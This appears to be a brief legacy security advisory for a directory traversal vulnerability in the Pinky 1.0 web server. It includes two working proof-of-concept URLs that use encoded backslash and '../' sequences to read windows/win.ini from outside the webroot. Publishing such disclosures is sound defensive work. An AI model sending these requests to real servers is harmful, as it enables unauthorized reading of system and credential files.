Home
Consulting
Advisories
Software
Articles
Contact

Pinky 1.0 Directory Traversal

Legacy Advisories

Description

A directory traversal vulnerability in Pinky 1.0 can be exploited to read files outside of the webroot directory.

Proof Of Concept

http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows/win.ini


Copyright © 2018 AutoSec Tools LLC